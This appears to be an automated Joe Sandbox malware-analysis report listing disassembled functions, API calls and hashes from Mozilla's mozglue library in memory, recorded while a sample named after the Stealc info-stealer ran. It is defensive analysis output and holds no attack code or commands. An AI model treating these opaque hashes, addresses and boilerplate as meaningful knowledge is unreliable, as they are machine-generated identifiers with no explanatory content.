free.MOZGLUE(?), ref: 6BFA146C

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: da98bc7fb2c1517fc7fd6efc62326f9f5fdea9f21b480033bc275cab60701bd6
Instruction ID: eca274d8c7ff13f9bc28e1524cfee9639cb748f19bd7653763cd966b52529887
Opcode Fuzzy Hash: da98bc7fb2c1517fc7fd6efc62326f9f5fdea9f21b480033bc275cab60701bd6
Instruction Fuzzy Hash: E761DF76904301DBDB14DF34C880B6AB7F5BFC6308F01895DE98947222EB39E559CB42

Function 6BF54B50 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6BF54667,?,?,?,?,?,?,?,?,6BF94843,?), ref: 6BF54C63
free.MOZGLUE(?,?,?,6BF54667,?,?,?,?,?,?,?,?,6BF94843,?), ref: 6BF54C89
free.MOZGLUE(?,?,?,6BF54667,?,?,?,?,?,?,?,?,6BF94843,?), ref: 6BF54CAC
free.MOZGLUE(?,?,?,?,?,?,?,6BF94843,?), ref: 6BF54CCF
free.MOZGLUE(?,?,?,?,?,?,?,?,6BF94843,?), ref: 6BF54CF2
free.MOZGLUE(?,?,?,?,?,?,?,?,6BF94843,?), ref: 6BF54D15
free.MOZGLUE(?,?,?,?,?,?,?,?,6BF94843,?), ref: 6BF54D38
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6BF54667,?,?,?,?,?,?,?,?,6BF94843,?), ref: 6BF54DD1

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1497960986-0
Opcode ID: a4813f215f16c31093a4d48c24287b3962e23df9a29839b71abebc10edcb1f9e
Instruction ID: 0d06b61809cdd09fe231c4f4ad2b8696c5f89eac4ddb66b820e5bc92ee988c38
Opcode Fuzzy Hash: a4813f215f16c31093a4d48c24287b3962e23df9a29839b71abebc10edcb1f9e
Instruction Fuzzy Hash: 2D517873504A408FE3348A3CD9A875677A2AF52728F404A5DE1A7CBFF5D339A4748742

Function 6BF5E9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,6BF61999), ref: 6BF5EA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6BF5EA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6BF5EA76
moz_xmalloc.MOZGLUE(-00000001,?,?,6BF61999), ref: 6BF5EA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6BF61999), ref: 6BF5EAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6BF5EADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6BF5EB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6BF5EB27

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: e4a4e8b9a325bb4a49c00aeaac9d1f800de7b7e88675828f439af4d9ecff89b7
Instruction ID: b91817f54ad5394c946b5a12cd37a6ab0963d4b79ea12ffd270643e8bf383be0
Opcode Fuzzy Hash: e4a4e8b9a325bb4a49c00aeaac9d1f800de7b7e88675828f439af4d9ecff89b7
Instruction Fuzzy Hash: C441AFB3A002169BDB14CE78DC81AAFB7A4BF54264F240668E815D72A4E734DA1487E1

Function 6BFAD310 Relevance: 12.1, APIs: 8, Instructions: 132threadtimeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BFAD36B
GetCurrentThreadId.KERNEL32 ref: 6BFAD38A
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BFAD39D
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BFAD3E1
free.MOZGLUE ref: 6BFAD408

Part of subcall function 6BF8CBE8: GetCurrentProcess.KERNEL32(?,6BF531A7), ref: 6BF8CBF1
Part of subcall function 6BF8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BF531A7), ref: 6BF8CBFA

GetCurrentThreadId.KERNEL32 ref: 6BFAD44B
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BFAD457
ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6BFAD472

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
String ID:
API String ID: 3843575911-0
Opcode ID: 62ad6c02705df26427b9c6e4baf4abea46eb49dda94ac9d8ed3c7ccffead248f
Instruction ID: 37050b2453e8818650713e729ae33f9274c73e16b1c3d48f084c25f849ca1bbb
Opcode Fuzzy Hash: 62ad6c02705df26427b9c6e4baf4abea46eb49dda94ac9d8ed3c7ccffead248f
Instruction Fuzzy Hash: B941AB76500305CFCB18DF74C489B9ABBB5FF85314F10492DE99687260EB79E948CB91

Function 6BF94AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6BF94AB7,?,6BF543CF,?,6BF542D2), ref: 6BF94B48
free.MOZGLUE(?,?,?,80000000,?,6BF94AB7,?,6BF543CF,?,6BF542D2), ref: 6BF94B7F
memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6BF94AB7,?,6BF543CF,?,6BF542D2), ref: 6BF94B94
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BF94AB7,?,6BF543CF,?,6BF542D2), ref: 6BF94BBC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6BF94AB7,?,6BF543CF,?,6BF542D2), ref: 6BF94BEE

Strings

pid:, xrefs: 6BF94BE8

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
String ID: pid:
API String ID: 1916652239-3403741246
Opcode ID: 23a58256494398bca3192d0cefbfda70f0bdd799d1a0f14bd06b652ee57e44d8
Instruction ID: bdb6d2524e7feb4ed68bb40b0c0886d8bd296549b483574ee01c52fab6b7c657
Opcode Fuzzy Hash: 23a58256494398bca3192d0cefbfda70f0bdd799d1a0f14bd06b652ee57e44d8
Instruction Fuzzy Hash: 15410772B002159BDB24DFBCEC80A9FBBE9EF95224B140638E869D7391D7349904C7B1

Function 6BFBAAB0 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6BFDE220,?), ref: 6BFBBC2D
ReleaseSRWLockExclusive.KERNEL32(6BFDE220), ref: 6BFBBC42
RtlFreeHeap.NTDLL ref: 6BFBBC82
RtlFreeUnicodeString.NTDLL(6BFDE210), ref: 6BFBBC91
RtlFreeUnicodeString.NTDLL(6BFDE208), ref: 6BFBBCA3
RtlFreeHeap.NTDLL ref: 6BFBBCD2
free.MOZGLUE(?), ref: 6BFBBCD8

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: a5f86e8d4074d8023ff42664be7841acbfd32a1c50fa5a20a75bf5e5abb376b6
Instruction ID: 7fefca46874ffb2cf3dd4a18b07e895f326a3a244943645abccb482b79d40a76
Opcode Fuzzy Hash: a5f86e8d4074d8023ff42664be7841acbfd32a1c50fa5a20a75bf5e5abb376b6
Instruction Fuzzy Hash: 4221BFB35003158FE720CF16D8C0B67B7A9FF45614F048869E8595B622CB79F841CB91

Function 6BF638A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6BFDE220,?,?,?,?,6BF63899,?), ref: 6BF638B2
ReleaseSRWLockExclusive.KERNEL32(6BFDE220,?,?,?,6BF63899,?), ref: 6BF638C3
free.MOZGLUE(00000000,?,00000000,0000002C,?,?,?,6BF63899,?), ref: 6BF638F1
RtlFreeHeap.NTDLL ref: 6BF63920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6BF63899,?), ref: 6BF6392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6BF63899,?), ref: 6BF63943
RtlFreeHeap.NTDLL ref: 6BF6396E

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: de4eca56697be41aa2f668411b5b65cd4240a182492a042dcdcb5f65eb3d4a33
Instruction ID: f457ed7dd1448417b72160b17bbd7047052b9e11c6ef1e9990998f3c1dce6724
Opcode Fuzzy Hash: de4eca56697be41aa2f668411b5b65cd4240a182492a042dcdcb5f65eb3d4a33
Instruction Fuzzy Hash: FC21F173600610DFE720CF29C880B86B7AAEF45364F11846DD95A97220D738E881CF91

Function 6BFAD1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BFAD1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BFAD1F5

Part of subcall function 6BFAAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6BFAAE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BFAD211
GetCurrentThreadId.KERNEL32 ref: 6BFAD217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BFAD226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BFAD279
free.MOZGLUE(?), ref: 6BFAD2B2

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: 93c195e6909ba7da107d6f142371288d299a966642ec7e9060c01cfdf2bfdb29
Instruction ID: 12dc01dd7a8c0f4464241e305d29c45f800b3d620278e96bd9d0f8d5d45d4b3b
Opcode Fuzzy Hash: 93c195e6909ba7da107d6f142371288d299a966642ec7e9060c01cfdf2bfdb29
Instruction Fuzzy Hash: B6217176614306DBCB04DF34C488A9EB7A5FF8A324F10492DE91687361DB35E909CB96

Function 6BF999A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BF64A68), ref: 6BF9945E
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BF99470
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BF99482
Part of subcall function 6BF99420: __Init_thread_footer.LIBCMT ref: 6BF9949F

GetCurrentThreadId.KERNEL32 ref: 6BF999C1
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF999CE
ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF999F8
GetCurrentThreadId.KERNEL32 ref: 6BF99A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BF99A0D

Part of subcall function 6BF99A60: GetCurrentThreadId.KERNEL32 ref: 6BF99A95
Part of subcall function 6BF99A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BF99A9D
Part of subcall function 6BF99A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BF99ACC
Part of subcall function 6BF99A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BF99BA7
Part of subcall function 6BF99A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BF99BB8
Part of subcall function 6BF99A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BF99BC9

Part of subcall function 6BF8CBE8: GetCurrentProcess.KERNEL32(?,6BF531A7), ref: 6BF8CBF1
Part of subcall function 6BF8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BF531A7), ref: 6BF8CBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6BF99A15

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: 7ac70df1040dd5a3784d7ad5e3bd4ad008deacbed147e54bd316e5795a823c2f
Instruction ID: 4c598dedd4910c51d92140ed625ce627508c429890a93c0dad5d31e90123ba46
Opcode Fuzzy Hash: 7ac70df1040dd5a3784d7ad5e3bd4ad008deacbed147e54bd316e5795a823c2f
Instruction Fuzzy Hash: 430104338141269FEB006F74E848B697B68EBC7258F0A8016ED0553332CB3D8808C6B2

Function 6BF662E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6BF8AB89: EnterCriticalSection.KERNEL32(6BFDE370,?,?,?,6BF534DE,6BFDF6CC,?,?,?,?,?,?,?,6BF53284), ref: 6BF8AB94
Part of subcall function 6BF8AB89: LeaveCriticalSection.KERNEL32(6BFDE370,?,6BF534DE,6BFDF6CC,?,?,?,?,?,?,?,6BF53284,?,?,6BF756F6), ref: 6BF8ABD1

LoadLibraryW.KERNEL32(combase.dll), ref: 6BF6631B
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6BF6633A
__Init_thread_footer.LIBCMT ref: 6BF6634E
FreeLibrary.KERNEL32 ref: 6BF66376

Strings

combase.dll, xrefs: 6BF66316
CoUninitialize, xrefs: 6BF66334

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoUninitialize$combase.dll
API String ID: 4190559335-3846590027
Opcode ID: e5908fae7931c1d9d284b57e417bf99d9780d9b0f27acbbf15b9cffc4ce977b6
Instruction ID: d07d620964772f27aa3663a6a8cd37de84b7b309f03a48f00aab3361dedf35df
Opcode Fuzzy Hash: e5908fae7931c1d9d284b57e417bf99d9780d9b0f27acbbf15b9cffc4ce977b6
Instruction Fuzzy Hash: 81018876430201DBEF40AF38D909F5477E0A78A351F081268ED01C23B0EB7AE019CF55

Function 6BFA9240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BFA9BAE
free.MOZGLUE(?,?), ref: 6BFA9BC3
free.MOZGLUE(?,?), ref: 6BFA9BD9

Part of subcall function 6BFA93B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BFA94C8
Part of subcall function 6BFA93B0: free.MOZGLUE(6BFA9281,?), ref: 6BFA94DD

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 69ef2d5031b0d8752ccd1f114be315182e7ab26f091c9c2f2eb7efa12867e0da
Instruction ID: 785c47db6ea1a96d0bce1fb425e819b6449309f5c63c283d081b5e7711856f81
Opcode Fuzzy Hash: 69ef2d5031b0d8752ccd1f114be315182e7ab26f091c9c2f2eb7efa12867e0da
Instruction Fuzzy Hash: D9B1AF72A04B05CBCB05CF68C48055FF3F5FFC9324B148669E859AB262DB36E946CB91

Function 6BF971A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6BF96060: moz_xmalloc.MOZGLUE(00000024,81B18D4B,00000000,?,00000000,?,?,6BF95FCB,6BF979A3), ref: 6BF96078

free.MOZGLUE(-00000001), ref: 6BF972F6
free.MOZGLUE(?), ref: 6BF97311

Strings

Spliced unique strings, xrefs: 6BF97340
333s, xrefs: 6BF97226
333s, xrefs: 6BF9731B
Copied unique strings, xrefs: 6BF97320

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: aaa7e11fbede2b752503dde3101173b17b1483656fa19764d2877b5721870b02
Instruction ID: 4cb4a61ade04ea0108b4a4ea11b2878859b30d76d6eeedbc3b0a000ade33d386
Opcode Fuzzy Hash: aaa7e11fbede2b752503dde3101173b17b1483656fa19764d2877b5721870b02
Instruction Fuzzy Hash: E071A972F002168FDB18DF69D89169EB7F2BF84314F25812DD819A7360DB39A946CBC1

Function 6BFAC160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BFAC1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6BFAC293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6BFAC29E

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: 30687dd7e3ff456b2d27a40b02bd74b5ae5e9faa941f678eecce96d7499066e9
Instruction ID: 7241a325f274a60fc0517106bd66000e8ca1bf0b2de71c201d6c6be667ce919f
Opcode Fuzzy Hash: 30687dd7e3ff456b2d27a40b02bd74b5ae5e9faa941f678eecce96d7499066e9
Instruction Fuzzy Hash: 93618C72A04218CFCB19CFACD8946AEBBF5EF49314F154969E812A7260C735A944CBA0

Function 6BF9CA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 6BF9CA57
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BF9CA69
Sleep.KERNEL32 ref: 6BF9CADD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BF9CAEA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BF9CAF5
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6BF9CB19

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
String ID:
API String ID: 432163150-0
Opcode ID: a0a3daa7aace31f7d0d27218ae81802a069a77d1343d97a17f313f903754a5be
Instruction ID: 6e1c7aec87a741ebbc2f1a84b8e3fbcee2d664f02a459f22f125cf920d8b1fa7
Opcode Fuzzy Hash: a0a3daa7aace31f7d0d27218ae81802a069a77d1343d97a17f313f903754a5be
Instruction Fuzzy Hash: 05215733A5060887D309AF38A85526FF7B9FFC6304F408629E845A71A0FF38C5988781

Function 6BF5EB90 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000104), ref: 6BF5EBB5

Part of subcall function 6BF6CA10: malloc.MOZGLUE(?), ref: 6BF6CA26

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6BF8D7F3), ref: 6BF5EBC3
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6BF8D7F3), ref: 6BF5EBD6
free.MOZGLUE(?,?,?,?,?,?,6BF8D7F3), ref: 6BF5EBF6
free.MOZGLUE(00000000,?,?,?,?,?,?,6BF8D7F3), ref: 6BF5EC0E

Part of subcall function 6BF75E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BF75EDB
Part of subcall function 6BF75E90: memset.VCRUNTIME140(6BFB7765,000000E5,55CCCCCC), ref: 6BF75F27
Part of subcall function 6BF75E90: LeaveCriticalSection.KERNEL32(?), ref: 6BF75FB2

GetLastError.KERNEL32(?,?,?,?,?,?,6BF8D7F3), ref: 6BF5EC1A

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
